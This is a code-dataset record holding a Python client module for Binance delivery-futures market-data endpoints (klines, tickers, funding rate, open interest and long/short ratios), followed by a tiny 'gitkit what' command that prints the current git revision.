Lookup** | *Get older market historical trades.* :API endpoint: ``GET /dapi/v1/historicalTrades`` :API doc: https://binance-docs.github.io/apidocs/delivery/en/#old-trades-lookup-market_data :parameter symbol: string; the trading pair :parameter limit: optional int; limit the results. Default 500, max 1000. :parameter formId: optional int; trade ID to fetch from. Default gets most recent trades. | """ check_required_parameter(symbol, "symbol") params = {"symbol": symbol, **kwargs} return self.limit_request("GET", "/dapi/v1/historicalTrades", params) def agg_trades(self, symbol: str, **kwargs): """ | | **Compressed/Aggregate Trades List** | *Get compressed, aggregate market trades. Market trades that fill at the time, from the same order, with the same price will have the quantity aggregated.* :API endpoint: ``GET /dapi/v1/aggTrades`` :API doc: https://binance-docs.github.io/apidocs/delivery/en/#compressed-aggregate-trades-list :parameter symbol: string; the trading pair :parameter limit: optional int; limit the results. Default 500, max 1000. :parameter formId: optional int; trade ID to fetch from. Default gets most recent trades. :parameter startTime: optional int; Timestamp in ms to get aggregate trades from INCLUSIVE. :parameter endTime: optional int; Timestamp in ms to get aggregate trades until INCLUSIVE. | """ check_required_parameter(symbol, "symbol") params = {"symbol": symbol, **kwargs} return self.query("/dapi/v1/aggTrades", params) def klines(self, symbol: str, interval: str, **kwargs): """ | | **Kline/Candlestick Data** | *Kline/candlestick bars for a symbol. Klines are uniquely identified by their open time.* :API endpoint: ``GET /dapi/v1/klines`` :API doc: https://binance-docs.github.io/apidocs/delivery/en/#kline-candlestick-data :parameter symbol: string; the trading pair :parameter interval: string; the interval of kline, e.g 1m, 5m, 1h, 1d, etc. (see more in https://binance-docs.github.io/apidocs/delivery/en/#public-endpoints-info) :parameter limit: optional int; limit the results. Default 500, max 1000. :parameter startTime: optional int; Timestamp in ms to get aggregate trades from INCLUSIVE. :parameter endTime: optional int; Timestamp in ms to get aggregate trades until INCLUSIVE. | """ check_required_parameters([[symbol, "symbol"], [interval, "interval"]]) params = {"symbol": symbol, "interval": interval, **kwargs} return self.query("/dapi/v1/klines", params) def continuous_klines(self, pair: str, contractType: str, interval: str, **kwargs): """ | | **Continuous Kline/Candlestick Data** | *Kline/candlestick bars for a specific contract type. Klines are uniquely identified by their open time.* :API endpoint: ``GET /dapi/v1/continuousKlines`` :API doc: https://binance-docs.github.io/apidocs/delivery/en/#continuous-contract-kline-candlestick-data :parameter pair: string; the trading pair :parameter contractType: string; PERPETUAL, CURRENT_MONTH, NEXT_MONTH, CURRENT_QUARTER, NEXT_QUARTER. :parameter interval: string; the interval of kline, e.g 1m, 5m, 1h, 1d, etc. (see more in https://binance-docs.github.io/apidocs/delivery/en/#public-endpoints-info) :parameter limit: optional int; limit the results. Default 500, max 1000. :parameter startTime: optional int; Timestamp in ms to get aggregate trades from INCLUSIVE. :parameter endTime: optional int; Timestamp in ms to get aggregate trades until INCLUSIVE. | """ check_required_parameters([[pair, "pair"], [contractType,"contractType"], [interval, "interval"]]) params = {"pair": pair, "contractType":contractType, "interval": interval, **kwargs} return self.query("/dapi/v1/continuousKlines", params) def index_price_klines(self, pair: str, interval: str, **kwargs): """ | | **Kline/Candlestick Data for the index price of a pair.** | *Klines are uniquely identified by their open time.* :API endpoint: ``GET /dapi/v1/indexPriceKlines`` :API doc: https://binance-docs.github.io/apidocs/delivery/en/#index-price-kline-candlestick-data :parameter pair: string; the trading pair :parameter interval: string; the interval of kline, e.g 1m, 5m, 1h, 1d, etc. (see more in https://binance-docs.github.io/apidocs/delivery/en/#public-endpoints-info) :parameter limit: optional int; limit the results. Default 500, max 1000. :parameter startTime: optional int; Timestamp in ms to get aggregate trades from INCLUSIVE. :parameter endTime: optional int; Timestamp in ms to get aggregate trades until INCLUSIVE. | """ check_required_parameters([[pair, "pair"], [interval, "interval"]]) params = {"pair": pair, "interval": interval, **kwargs} return self.query("/dapi/v1/indexPriceKlines", params) def mark_price_klines(self, symbol: str, interval: str, **kwargs): """ | | **Kline/candlestick bars for the mark price of a symbol.** | *Klines are uniquely identified by their open time.* :API endpoint: ``GET /dapi/v1/markPriceKlines`` :API doc: https://binance-docs.github.io/apidocs/delivery/en/#mark-price-kline-candlestick-data :parameter pair: string; the trading pair :parameter interval: string; the interval of kline, e.g 1m, 5m, 1h, 1d, etc. (see more in https://binance-docs.github.io/apidocs/delivery/en/#public-endpoints-info) :parameter limit: optional int; limit the results. Default 500, max 1000. :parameter startTime: optional int; Timestamp in ms to get aggregate trades from INCLUSIVE. :parameter endTime: optional int; Timestamp in ms to get aggregate trades until INCLUSIVE. **Notes** - The difference between startTime and endTime can only be up to 200 days - Between startTime and endTime, the most recent limit data from endTime will be returned: - If startTime and endTime are not sent, current timestamp will be set as endTime, and the most recent data will be returned. - If startTime is sent only, the timestamp of 200 days after startTime will be set as endTime(up to the current time) - If endTime is sent only, the timestamp of 200 days before endTime will be set as startTime | """ check_required_parameters([[symbol, "symbol"], [interval, "interval"]]) params = {"symbol": symbol, "interval": interval, **kwargs} return self.query("/dapi/v1/markPriceKlines", params) def mark_price(self, symbol: str): """ | | **Mark Price and Funding Rate** :API endpoint: ``GET /dapi/v1/premiumIndex`` :API doc: https://binance-docs.github.io/apidocs/delivery/en/#index-price-and-mark-price :parameter symbol: string; the trading pair | """ check_required_parameter(symbol, "symbol") params = { "symbol": symbol, } return self.query("/dapi/v1/premiumIndex", params) def funding_rate(self, symbol: str, **kwargs): """ | | **Funding Rate History** :API endpoint: ``GET /dapi/v1/fundingRate`` :API doc: https://binance-docs.github.io/apidocs/delivery/en/#get-funding-rate-history-of-perpetual-futures :parameter symbol: string; the trading pair :parameter limit: optional int; limit the results. Default 500, max 1000. :parameter startTime: optional int; Timestamp in ms to get aggregate trades from INCLUSIVE. :parameter endTime: optional int; Timestamp in ms to get aggregate trades until INCLUSIVE. **Notes** - Empty array will be returned for delivery symbols. | """ params = {"symbol": symbol, **kwargs} return self.query("/dapi/v1/fundingRate", params) def ticker_24hr_price_change(self, symbol: str = None, pair: str = None): """ | | **24 hour rolling window price change statistics.** | *Careful when accessing this with no symbol.* | *If the symbol is not sent, tickers for all symbols will be returned in an array.* :API endpoint: ``GET /dapi/v1/ticker/24hr`` :API doc: https://binance-docs.github.io/apidocs/delivery/en/#24hr-ticker-price-change-statistics :parameter symbol: optional string; the trading symbol :parameter pair: optional string; the trading pair **Notes** - Symbol and pair cannot be sent together - If a pair is sent, tickers for all symbols of the pair will be returned - If either a pair or symbol is sent, tickers for all symbols of all pairs will be returned | """ if (symbol is None) and (pair is None): return self.query("/dapi/v1/ticker/24hr") elif (symbol is None): params = {"pair": pair} else: params = {"symbol": symbol} return self.query("/dapi/v1/ticker/24hr", params) def ticker_price(self, symbol: str = None, pair: str = None): """ | | **Latest price for a symbol or symbols** :API endpoint: ``GET /dapi/v1/ticker/price`` :API doc: https://binance-docs.github.io/apidocs/delivery/en/#symbol-price-ticker :parameter symbol: optional string; the trading symbol :parameter pair: optional string; the trading pair **Notes** - Symbol and pair cannot be sent together - If a pair is sent,tickers for all symbols of the pair will be returned - If either a pair or symbol is sent, tickers for all symbols of all pairs will be returned | """ if (symbol is None) and (pair is None): return self.query("/dapi/v1/ticker/price") elif (symbol is None): params = {"pair": pair} else: params = {"symbol": symbol} return self.query("/dapi/v1/ticker/price", params) def book_ticker(self, symbol: str = None, pair: str = None): """ | | **Best price/qty on the order book for a symbol or symbols** :API endpoint: ``GET /dapi/v1/ticker/bookTicker`` :API doc: https://binance-docs.github.io/apidocs/delivery/en/#symbol-order-book-ticker :parameter symbol: optional string; the trading symbol **Notes** - If the symbol is not sent, bookTickers for all symbols will be returned in an array. | """ if (symbol is None) and (pair is None): return self.query("/dapi/v1/ticker/bookTicker") elif (symbol is None): params = {"pair": pair} else: params = {"symbol": symbol} return self.query("/dapi/v1/ticker/bookTicker", params) def open_interest(self, symbol: str): """ | | **Get present open interest of a specific symbol** :API endpoint: ``GET /dapi/v1/openInterest`` :API doc: https://binance-docs.github.io/apidocs/delivery/en/#open-interest :parameter symbol: string; the trading symbol | """ check_required_parameter(symbol, "symbol") params = {"symbol": symbol} return self.query("/dapi/v1/ticker/bookTicker", params) def open_interest_hist(self, pair: str, contractType: str, period: str, **kwargs): """ | | **Get historical open interest of a specific symbol** :API endpoint: ``GET /futures/data/openInterestHist`` :API doc: https://binance-docs.github.io/apidocs/delivery/en/#open-interest-statistics-market-data :parameter pair: string; the trading pair :parameter contractType: string; ALL, CURRENT_QUARTER, NEXT_QUARTER, PERPETUAL. :parameter period: string; the period of open interest, "5m", "15m", "30m", "1h", "2h", "4h", "6h", "12h", "1d". (see more in https://binance-docs.github.io/apidocs/delivery/en/#public-endpoints-info) :parameter limit: optional int; limit the results. Default 30, max 500. :parameter startTime: optional int :parameter endTime: optional int **Notes** - If startTime and endTime are not sent, the most recent data is returned. - Only the data of the latest 30 days is available. | """ check_required_parameters([[pair, "pair"], [contractType, "contractType"], [period, "period"]]) params = {"pair": pair, "contractType": contractType, "period": period, **kwargs} return self.query("/futures/data/openInterestHist", params) def top_long_short_account_ratio(self, pair: str, period: str, **kwargs): """ | | **Get top long short account ratio** :API endpoint: `GET /futures/data/topLongShortAccountRatio` :API doc: https://binance-docs.github.io/apidocs/delivery/en/#top-trader-long-short-ratio-accounts-market-data :parameter pair: string; the trading pair :parameter period: string; the period of open interest, "5m", "15m", "30m", "1h", "2h", "4h", "6h", "12h", "1d". (see more in https://binance-docs.github.io/apidocs/delivery/en/#public-endpoints-info) :parameter limit: optional int; limit the results. Default 30, max 500. :parameter startTime: optional int :parameter endTime: optional int **Notes** - If startTime and endTime are not sent, the most recent data is returned. - Only the data of the latest 30 days is available. | """ check_required_parameters([[pair, "pair"], [period, "period"]]) params = {"pair": pair, "period": period, **kwargs} return self.query("/futures/data/topLongShortAccountRatio", params) def top_long_short_position_ratio(self, pair: str, period: str, **kwargs): """ | | **Get top long short position ratio** :API endpoint: ``GET /futures/data/topLongShortPositionRatio`` :API doc: https://binance-docs.github.io/apidocs/delivery/en/#top-trader-long-short-ratio-positions-market-data :parameter pair: string; the trading pair :parameter period: string; the period of open interest, "5m", "15m", "30m", "1h", "2h", "4h", "6h", "12h", "1d". (see more in https://binance-docs.github.io/apidocs/delivery/en/#public-endpoints-info) :parameter limit: optional int; limit the results. Default 30, max 500. :parameter startTime: optional int :parameter endTime: optional int **Notes** - If startTime and endTime are not sent, the most recent data is returned. - Only the data of the latest 30 days is available. | """ check_required_parameters([[pair, "pair"], [period, "period"]]) params = {"pair": pair, "period": period, **kwargs} return self.query("/futures/data/topLongShortPositionRatio", params) def long_short_account_ratio(self, pair: str, period: str, **kwargs): """ | | **Get top long short account ratio** :API endpoint: ``GET /futures/data/globalLongShortAccountRatio`` :API doc: https://binance-docs.github.io/apidocs/delivery/en/#top-trader-long-short-ratio-accounts-market-data :parameter pair: string; the trading pair :parameter period: string; the period of open interest, "5m", "15m", "30m", "1h", "2h", "4h", "6h", "12h", "1d". (see more in https://binance-docs.github.io/apidocs/delivery/en/#public-endpoints-info) :parameter limit: optional int; limit the results. Default 30, max 500. :parameter startTime: optional int :parameter endTime: optional int **Notes** - If startTime and endTime are not sent, the most recent data is returned. - Only the data of the latest 30 days is available. | """ check_required_parameters([[pair, "pair"], [period, "period"]]) params = {"pair": pair, "period": period, **kwargs} return self.query("/futures/data/globalLongShortAccountRatio", params) def taker_long_short_ratio(self, pair: str, contractType: str, period: str, **kwargs): """ | | **Get taker long short ratio** :API endpoint: ``GET /futures/data/takerBuySellVol`` :API doc: https://binance-docs.github.io/apidocs/delivery/en/#taker-buy-sell-volume-market-data :parameter pair: string; the trading pair :parameter contractType: string; CURRENT_QUARTER, NEXT_QUARTER, PERPETUAL. :parameter period: string; the period of open interest, "5m", "15m", "30m", "1h", "2h", "4h", "6h", "12h", "1d". (see more in https://binance-docs.github.io/apidocs/delivery/en/#public-endpoints-info) :parameter limit: optional int; limit the results. Default 30, max 500. :parameter startTime: optional int :parameter endTime: optional int **Notes** - If startTime and endTime are not sent, the most recent data is returned. - Only the data of the latest 30 days is available. | """ check_required_parameters([[pair, "pair"], [contractType, "contractType"], [period, "period"]]) params = {"pair": pair, "contractType": contractType, "period": period, **kwargs} return self.query("/futures/data/takerBuySellVol", params) def basis(self, pair: str, contractType: str, period: str, **kwargs): """ | | **Get Index Composite** :API endpoint: ``GET /futures/data/basis`` :API doc: xshttps://binance-docs.github.io/apidocs/delivery/en/#basis-market-data :parameter pair: string; the trading pair :parameter contractType: string; CURRENT_QUARTER, NEXT_QUARTER, PERPETUAL. :parameter period: string; the period of open interest, "5m", "15m", "30m", "1h", "2h", "4h", "6h", "12h", "1d". (see more in https://binance-docs.github.io/apidocs/delivery/en/#public-endpoints-info) :parameter limit: optional int; limit the results. Default 30, max 500. :parameter startTime: optional int :parameter endTime: optional int **Notes** - If startTime and endTime are not sent, the most recent data is returned. - Only the data of the latest 30 days is available. | """ check_required_parameters([[pair, "pair"], [contractType, "contractType"], [period, "period"]]) params = {"pair": pair, "contractType": contractType, "period": period, **kwargs} return self.query("/futures/data/basis", params)
38.679537
204
0.674636
from binance.lib.utils import ( check_required_parameter, ) from binance.lib.utils import check_required_parameters def ping(self): """ | | **Test Connectivity** | *Test connectivity to the Rest API.* :API endpoint: ``GET /dapi/v1/ping`` :API doc: https://binance-docs.github.io/apidocs/delivery/en/#test-connectivity | """ url_path = "/dapi/v1/ping" return self.query(url_path) def time(self): """ | | **Check Server Time** | *Test connectivity to the Rest API and get the current server time.* :API endpoint: ``GET /dapi/v1/time`` :API doc: https://binance-docs.github.io/apidocs/delivery/en/#check-server-time | """ url_path = "/dapi/v1/time" return self.query(url_path) def exchange_info(self): """ | | **Exchange Information** | *Current exchange trading rules and symbol information* :API endpoint: ``GET /dapi/v1/exchangeInfo`` :API doc: https://binance-docs.github.io/apidocs/delivery/en/#exchange-information | """ url_path = "/dapi/v1/exchangeInfo" return self.query(url_path) def depth(self, symbol: str, **kwargs): """ | | **Get Orderbook** :API endpoint: ``GET /dapi/v1/depth`` :API doc: https://binance-docs.github.io/apidocs/delivery/en/#order-book :parameter symbol: string; the trading pair :parameter limit: optional int; limit the results. Default 500, valid limits: [5, 10, 20, 50, 100, 500, 1000]. | """ check_required_parameter(symbol, "symbol") params = {"symbol": symbol, **kwargs} return self.query("/dapi/v1/depth", params) def trades(self, symbol: str, **kwargs): """ | | **Get Recent Market Trades** :API endpoint: ``GET /dapi/v1/trades`` :API doc: https://binance-docs.github.io/apidocs/delivery/en/#recent-trades-list :parameter symbol: string; the trading pair :parameter limit: optional int; limit the results. Default 500, max 1000. | """ check_required_parameter(symbol, "symbol") params = {"symbol": symbol, **kwargs} return self.query("/dapi/v1/trades", params) def historical_trades(self, symbol: str, **kwargs): """ | | **Old Trade Lookup** | *Get older market historical trades.* :API endpoint: ``GET /dapi/v1/historicalTrades`` :API doc: https://binance-docs.github.io/apidocs/delivery/en/#old-trades-lookup-market_data :parameter symbol: string; the trading pair :parameter limit: optional int; limit the results. Default 500, max 1000. :parameter formId: optional int; trade ID to fetch from. Default gets most recent trades. | """ check_required_parameter(symbol, "symbol") params = {"symbol": symbol, **kwargs} return self.limit_request("GET", "/dapi/v1/historicalTrades", params) def agg_trades(self, symbol: str, **kwargs): """ | | **Compressed/Aggregate Trades List** | *Get compressed, aggregate market trades. Market trades that fill at the time, from the same order, with the same price will have the quantity aggregated.* :API endpoint: ``GET /dapi/v1/aggTrades`` :API doc: https://binance-docs.github.io/apidocs/delivery/en/#compressed-aggregate-trades-list :parameter symbol: string; the trading pair :parameter limit: optional int; limit the results. Default 500, max 1000. :parameter formId: optional int; trade ID to fetch from. Default gets most recent trades. :parameter startTime: optional int; Timestamp in ms to get aggregate trades from INCLUSIVE. :parameter endTime: optional int; Timestamp in ms to get aggregate trades until INCLUSIVE. | """ check_required_parameter(symbol, "symbol") params = {"symbol": symbol, **kwargs} return self.query("/dapi/v1/aggTrades", params) def klines(self, symbol: str, interval: str, **kwargs): """ | | **Kline/Candlestick Data** | *Kline/candlestick bars for a symbol. Klines are uniquely identified by their open time.* :API endpoint: ``GET /dapi/v1/klines`` :API doc: https://binance-docs.github.io/apidocs/delivery/en/#kline-candlestick-data :parameter symbol: string; the trading pair :parameter interval: string; the interval of kline, e.g 1m, 5m, 1h, 1d, etc. (see more in https://binance-docs.github.io/apidocs/delivery/en/#public-endpoints-info) :parameter limit: optional int; limit the results. Default 500, max 1000. :parameter startTime: optional int; Timestamp in ms to get aggregate trades from INCLUSIVE. :parameter endTime: optional int; Timestamp in ms to get aggregate trades until INCLUSIVE. | """ check_required_parameters([[symbol, "symbol"], [interval, "interval"]]) params = {"symbol": symbol, "interval": interval, **kwargs} return self.query("/dapi/v1/klines", params) def continuous_klines(self, pair: str, contractType: str, interval: str, **kwargs): """ | | **Continuous Kline/Candlestick Data** | *Kline/candlestick bars for a specific contract type. Klines are uniquely identified by their open time.* :API endpoint: ``GET /dapi/v1/continuousKlines`` :API doc: https://binance-docs.github.io/apidocs/delivery/en/#continuous-contract-kline-candlestick-data :parameter pair: string; the trading pair :parameter contractType: string; PERPETUAL, CURRENT_MONTH, NEXT_MONTH, CURRENT_QUARTER, NEXT_QUARTER. :parameter interval: string; the interval of kline, e.g 1m, 5m, 1h, 1d, etc. (see more in https://binance-docs.github.io/apidocs/delivery/en/#public-endpoints-info) :parameter limit: optional int; limit the results. Default 500, max 1000. :parameter startTime: optional int; Timestamp in ms to get aggregate trades from INCLUSIVE. :parameter endTime: optional int; Timestamp in ms to get aggregate trades until INCLUSIVE. | """ check_required_parameters([[pair, "pair"], [contractType,"contractType"], [interval, "interval"]]) params = {"pair": pair, "contractType":contractType, "interval": interval, **kwargs} return self.query("/dapi/v1/continuousKlines", params) def index_price_klines(self, pair: str, interval: str, **kwargs): """ | | **Kline/Candlestick Data for the index price of a pair.** | *Klines are uniquely identified by their open time.* :API endpoint: ``GET /dapi/v1/indexPriceKlines`` :API doc: https://binance-docs.github.io/apidocs/delivery/en/#index-price-kline-candlestick-data :parameter pair: string; the trading pair :parameter interval: string; the interval of kline, e.g 1m, 5m, 1h, 1d, etc. (see more in https://binance-docs.github.io/apidocs/delivery/en/#public-endpoints-info) :parameter limit: optional int; limit the results. Default 500, max 1000. :parameter startTime: optional int; Timestamp in ms to get aggregate trades from INCLUSIVE. :parameter endTime: optional int; Timestamp in ms to get aggregate trades until INCLUSIVE. | """ check_required_parameters([[pair, "pair"], [interval, "interval"]]) params = {"pair": pair, "interval": interval, **kwargs} return self.query("/dapi/v1/indexPriceKlines", params) def mark_price_klines(self, symbol: str, interval: str, **kwargs): """ | | **Kline/candlestick bars for the mark price of a symbol.** | *Klines are uniquely identified by their open time.* :API endpoint: ``GET /dapi/v1/markPriceKlines`` :API doc: https://binance-docs.github.io/apidocs/delivery/en/#mark-price-kline-candlestick-data :parameter pair: string; the trading pair :parameter interval: string; the interval of kline, e.g 1m, 5m, 1h, 1d, etc. (see more in https://binance-docs.github.io/apidocs/delivery/en/#public-endpoints-info) :parameter limit: optional int; limit the results. Default 500, max 1000. :parameter startTime: optional int; Timestamp in ms to get aggregate trades from INCLUSIVE. :parameter endTime: optional int; Timestamp in ms to get aggregate trades until INCLUSIVE. **Notes** - The difference between startTime and endTime can only be up to 200 days - Between startTime and endTime, the most recent limit data from endTime will be returned: - If startTime and endTime are not sent, current timestamp will be set as endTime, and the most recent data will be returned. - If startTime is sent only, the timestamp of 200 days after startTime will be set as endTime(up to the current time) - If endTime is sent only, the timestamp of 200 days before endTime will be set as startTime | """ check_required_parameters([[symbol, "symbol"], [interval, "interval"]]) params = {"symbol": symbol, "interval": interval, **kwargs} return self.query("/dapi/v1/markPriceKlines", params) def mark_price(self, symbol: str): """ | | **Mark Price and Funding Rate** :API endpoint: ``GET /dapi/v1/premiumIndex`` :API doc: https://binance-docs.github.io/apidocs/delivery/en/#index-price-and-mark-price :parameter symbol: string; the trading pair | """ check_required_parameter(symbol, "symbol") params = { "symbol": symbol, } return self.query("/dapi/v1/premiumIndex", params) def funding_rate(self, symbol: str, **kwargs): """ | | **Funding Rate History** :API endpoint: ``GET /dapi/v1/fundingRate`` :API doc: https://binance-docs.github.io/apidocs/delivery/en/#get-funding-rate-history-of-perpetual-futures :parameter symbol: string; the trading pair :parameter limit: optional int; limit the results. Default 500, max 1000. :parameter startTime: optional int; Timestamp in ms to get aggregate trades from INCLUSIVE. :parameter endTime: optional int; Timestamp in ms to get aggregate trades until INCLUSIVE. **Notes** - Empty array will be returned for delivery symbols. | """ params = {"symbol": symbol, **kwargs} return self.query("/dapi/v1/fundingRate", params) def ticker_24hr_price_change(self, symbol: str = None, pair: str = None): """ | | **24 hour rolling window price change statistics.** | *Careful when accessing this with no symbol.* | *If the symbol is not sent, tickers for all symbols will be returned in an array.* :API endpoint: ``GET /dapi/v1/ticker/24hr`` :API doc: https://binance-docs.github.io/apidocs/delivery/en/#24hr-ticker-price-change-statistics :parameter symbol: optional string; the trading symbol :parameter pair: optional string; the trading pair **Notes** - Symbol and pair cannot be sent together - If a pair is sent, tickers for all symbols of the pair will be returned - If either a pair or symbol is sent, tickers for all symbols of all pairs will be returned | """ if (symbol is None) and (pair is None): return self.query("/dapi/v1/ticker/24hr") elif (symbol is None): params = {"pair": pair} else: params = {"symbol": symbol} return self.query("/dapi/v1/ticker/24hr", params) def ticker_price(self, symbol: str = None, pair: str = None): """ | | **Latest price for a symbol or symbols** :API endpoint: ``GET /dapi/v1/ticker/price`` :API doc: https://binance-docs.github.io/apidocs/delivery/en/#symbol-price-ticker :parameter symbol: optional string; the trading symbol :parameter pair: optional string; the trading pair **Notes** - Symbol and pair cannot be sent together - If a pair is sent,tickers for all symbols of the pair will be returned - If either a pair or symbol is sent, tickers for all symbols of all pairs will be returned | """ if (symbol is None) and (pair is None): return self.query("/dapi/v1/ticker/price") elif (symbol is None): params = {"pair": pair} else: params = {"symbol": symbol} return self.query("/dapi/v1/ticker/price", params) def book_ticker(self, symbol: str = None, pair: str = None): """ | | **Best price/qty on the order book for a symbol or symbols** :API endpoint: ``GET /dapi/v1/ticker/bookTicker`` :API doc: https://binance-docs.github.io/apidocs/delivery/en/#symbol-order-book-ticker :parameter symbol: optional string; the trading symbol **Notes** - If the symbol is not sent, bookTickers for all symbols will be returned in an array. | """ if (symbol is None) and (pair is None): return self.query("/dapi/v1/ticker/bookTicker") elif (symbol is None): params = {"pair": pair} else: params = {"symbol": symbol} return self.query("/dapi/v1/ticker/bookTicker", params) def open_interest(self, symbol: str): """ | | **Get present open interest of a specific symbol** :API endpoint: ``GET /dapi/v1/openInterest`` :API doc: https://binance-docs.github.io/apidocs/delivery/en/#open-interest :parameter symbol: string; the trading symbol | """ check_required_parameter(symbol, "symbol") params = {"symbol": symbol} return self.query("/dapi/v1/ticker/bookTicker", params) def open_interest_hist(self, pair: str, contractType: str, period: str, **kwargs): """ | | **Get historical open interest of a specific symbol** :API endpoint: ``GET /futures/data/openInterestHist`` :API doc: https://binance-docs.github.io/apidocs/delivery/en/#open-interest-statistics-market-data :parameter pair: string; the trading pair :parameter contractType: string; ALL, CURRENT_QUARTER, NEXT_QUARTER, PERPETUAL. :parameter period: string; the period of open interest, "5m", "15m", "30m", "1h", "2h", "4h", "6h", "12h", "1d". (see more in https://binance-docs.github.io/apidocs/delivery/en/#public-endpoints-info) :parameter limit: optional int; limit the results. Default 30, max 500. :parameter startTime: optional int :parameter endTime: optional int **Notes** - If startTime and endTime are not sent, the most recent data is returned. - Only the data of the latest 30 days is available. | """ check_required_parameters([[pair, "pair"], [contractType, "contractType"], [period, "period"]]) params = {"pair": pair, "contractType": contractType, "period": period, **kwargs} return self.query("/futures/data/openInterestHist", params) def top_long_short_account_ratio(self, pair: str, period: str, **kwargs): """ | | **Get top long short account ratio** :API endpoint: `GET /futures/data/topLongShortAccountRatio` :API doc: https://binance-docs.github.io/apidocs/delivery/en/#top-trader-long-short-ratio-accounts-market-data :parameter pair: string; the trading pair :parameter period: string; the period of open interest, "5m", "15m", "30m", "1h", "2h", "4h", "6h", "12h", "1d". (see more in https://binance-docs.github.io/apidocs/delivery/en/#public-endpoints-info) :parameter limit: optional int; limit the results. Default 30, max 500. :parameter startTime: optional int :parameter endTime: optional int **Notes** - If startTime and endTime are not sent, the most recent data is returned. - Only the data of the latest 30 days is available. | """ check_required_parameters([[pair, "pair"], [period, "period"]]) params = {"pair": pair, "period": period, **kwargs} return self.query("/futures/data/topLongShortAccountRatio", params) def top_long_short_position_ratio(self, pair: str, period: str, **kwargs): """ | | **Get top long short position ratio** :API endpoint: ``GET /futures/data/topLongShortPositionRatio`` :API doc: https://binance-docs.github.io/apidocs/delivery/en/#top-trader-long-short-ratio-positions-market-data :parameter pair: string; the trading pair :parameter period: string; the period of open interest, "5m", "15m", "30m", "1h", "2h", "4h", "6h", "12h", "1d". (see more in https://binance-docs.github.io/apidocs/delivery/en/#public-endpoints-info) :parameter limit: optional int; limit the results. Default 30, max 500. :parameter startTime: optional int :parameter endTime: optional int **Notes** - If startTime and endTime are not sent, the most recent data is returned. - Only the data of the latest 30 days is available. | """ check_required_parameters([[pair, "pair"], [period, "period"]]) params = {"pair": pair, "period": period, **kwargs} return self.query("/futures/data/topLongShortPositionRatio", params) def long_short_account_ratio(self, pair: str, period: str, **kwargs): """ | | **Get top long short account ratio** :API endpoint: ``GET /futures/data/globalLongShortAccountRatio`` :API doc: https://binance-docs.github.io/apidocs/delivery/en/#top-trader-long-short-ratio-accounts-market-data :parameter pair: string; the trading pair :parameter period: string; the period of open interest, "5m", "15m", "30m", "1h", "2h", "4h", "6h", "12h", "1d". (see more in https://binance-docs.github.io/apidocs/delivery/en/#public-endpoints-info) :parameter limit: optional int; limit the results. Default 30, max 500. :parameter startTime: optional int :parameter endTime: optional int **Notes** - If startTime and endTime are not sent, the most recent data is returned. - Only the data of the latest 30 days is available. | """ check_required_parameters([[pair, "pair"], [period, "period"]]) params = {"pair": pair, "period": period, **kwargs} return self.query("/futures/data/globalLongShortAccountRatio", params) def taker_long_short_ratio(self, pair: str, contractType: str, period: str, **kwargs): """ | | **Get taker long short ratio** :API endpoint: ``GET /futures/data/takerBuySellVol`` :API doc: https://binance-docs.github.io/apidocs/delivery/en/#taker-buy-sell-volume-market-data :parameter pair: string; the trading pair :parameter contractType: string; CURRENT_QUARTER, NEXT_QUARTER, PERPETUAL. :parameter period: string; the period of open interest, "5m", "15m", "30m", "1h", "2h", "4h", "6h", "12h", "1d". (see more in https://binance-docs.github.io/apidocs/delivery/en/#public-endpoints-info) :parameter limit: optional int; limit the results. Default 30, max 500. :parameter startTime: optional int :parameter endTime: optional int **Notes** - If startTime and endTime are not sent, the most recent data is returned. - Only the data of the latest 30 days is available. | """ check_required_parameters([[pair, "pair"], [contractType, "contractType"], [period, "period"]]) params = {"pair": pair, "contractType": contractType, "period": period, **kwargs} return self.query("/futures/data/takerBuySellVol", params) def basis(self, pair: str, contractType: str, period: str, **kwargs): """ | | **Get Index Composite** :API endpoint: ``GET /futures/data/basis`` :API doc: xshttps://binance-docs.github.io/apidocs/delivery/en/#basis-market-data :parameter pair: string; the trading pair :parameter contractType: string; CURRENT_QUARTER, NEXT_QUARTER, PERPETUAL. :parameter period: string; the period of open interest, "5m", "15m", "30m", "1h", "2h", "4h", "6h", "12h", "1d". (see more in https://binance-docs.github.io/apidocs/delivery/en/#public-endpoints-info) :parameter limit: optional int; limit the results. Default 30, max 500. :parameter startTime: optional int :parameter endTime: optional int **Notes** - If startTime and endTime are not sent, the most recent data is returned. - Only the data of the latest 30 days is available. | """ check_required_parameters([[pair, "pair"], [contractType, "contractType"], [period, "period"]]) params = {"pair": pair, "contractType": contractType, "period": period, **kwargs} return self.query("/futures/data/basis", params)
0
0
0
6561f371a02903143318b73cd46ae7e124479c61
279
py
Python
gitkit/commands/what.py
akx/git-kit
54948b57f201adecc810c4895b6712c1c8265cf3
[ "MIT" ]
3
2017-02-16T09:04:09.000Z
2021-05-03T08:25:52.000Z
gitkit/commands/what.py
akx/git-kit
54948b57f201adecc810c4895b6712c1c8265cf3
[ "MIT" ]
2
2017-02-16T08:54:15.000Z
2017-02-16T09:09:41.000Z
gitkit/commands/what.py
akx/git-kit
54948b57f201adecc810c4895b6712c1c8265cf3
[ "MIT" ]
1
2022-02-07T09:07:39.000Z
2022-02-07T09:07:39.000Z
import click from gitkit.util.shell import get_output @click.command() def what(): """ What _is_ the current revision anyway? """ description = get_output("git describe") revision = get_output("git rev-parse HEAD") print(f"{description} ({revision})")
19.928571
47
0.670251
import click from gitkit.util.shell import get_output @click.command() def what(): """ What _is_ the current revision anyway? """ description = get_output("git describe") revision = get_output("git rev-parse HEAD") print(f"{description} ({revision})")
0
0
0
d7905df33f83738c4064bc686d449bb022aa90b4
1,281
py
Python
census/code.py
Balaji-Pa/greyatom-python-for-data-science
801905c377cbd0a573a9d5d8cc0b66972bffc4af
[ "MIT" ]
null
null
null
census/code.py
Balaji-Pa/greyatom-python-for-data-science
801905c377cbd0a573a9d5d8cc0b66972bffc4af
[ "MIT" ]
null
null
null
census/code.py
Balaji-Pa/greyatom-python-for-data-science
801905c377cbd0a573a9d5d8cc0b66972bffc4af
[ "MIT" ]
null
null
null
